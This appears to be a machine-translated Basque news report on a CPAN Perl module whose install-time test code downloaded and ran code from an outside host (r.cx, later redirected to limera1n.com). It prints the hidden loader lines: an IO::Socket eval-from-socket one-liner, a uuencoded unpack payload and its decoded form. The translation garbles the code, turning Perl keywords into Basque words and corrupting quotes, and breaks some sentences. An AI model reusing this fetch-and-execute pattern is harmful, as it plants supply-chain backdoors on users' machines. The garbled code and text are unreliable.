CPAN direktorioaren bidez banatutako Perl pakete batean , CPAN moduluak hegaldian automatikoki kargatzeko diseinatua, kode gaiztoa. Txertaketa gaiztoa zen proba kodean , 2011tik bidaltzen ari dena.
Azpimarratzekoa da zalantzazko kodea kargatzeari buruzko galderak sortu zirela 2016an bueltan.
Asmo txarreko jarduerak hirugarrenen zerbitzari batetik (http://r.cx:1/) kodea deskargatu eta exekutatzeko saiakeran datza, modulua instalatzean abiarazitako proba-multzo baten exekuzioan. Uste da hasiera batean kanpoko zerbitzaritik deskargatutako kodea ez zela gaiztoa izan, baina orain eskaera ww.limera1n.com domeinura birbideratzen da, exekuziorako bere kodearen zatia ematen duena.
Deskarga fitxategi batean antolatzeko Kode hau erabiltzen da:
nire $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
nire $saiatu = `$^X $prog`;
Zehaztutako kodeak scripta exekutatzea eragiten du , zeinaren edukia lerrora murriztuta:
erabili lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β³};
Script hau kargatzen da zerbitzua erabiliz r.cx kanpoko ostalariaren kodea (82.46.99.88 karaktere kodeak "R.cX" testuari dagozkio) eta eval blokean exekutatzen du.
$ perl -MIO::Socket -e'$b=berria IO::Socket::INET 82.46.99.88.":1β³; inprimatu <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DEβ¦.}
Despaketatu ondoren, azkenik, honako hau exekutatzen da: :
inprimatu{$b=new IO::Socket::INET"ww.limera1n.com:80β³}"GET /iJailBreak
";evalor return warn$@while$b;1
Pakete arazotsua biltegitik kendu da. (Perl Authors Upload Server), eta moduluaren egilearen kontua blokeatuta dago. Kasu honetan, modulua oraindik geratzen da MetaCPAN artxiboan eta MetaCPANetik zuzenean instalatu daiteke cpanminus bezalako utilitate batzuk erabiliz. paketea ez zela asko banatuta.
Interesgarria eztabaidatzeko eta moduluaren egileak, bere gunea "r.cx" hackeatu ostean kode gaiztoa txertatu zelako informazioa ukatu zuen eta ondo pasatzen ari zela azaldu zuen, eta perlobfuscator.com erabili zuen zerbait ez ezkutatzeko, tamaina murrizteko baizik. kodearen eta arbelaren bidez kopiatzea erraztuz. "botstrap" funtzioaren izena aukeratzea hitz honek "bot bezalakoa da eta bootstrap baino laburragoa da". Moduluaren egileak ere ziurtatu du identifikatutako manipulazioek ez dutela ekintza maltzurrik egiten, baizik eta kodea TCP bidez kargatu eta exekutatzen dela frogatzen dutela.
Iturria: opennet.ru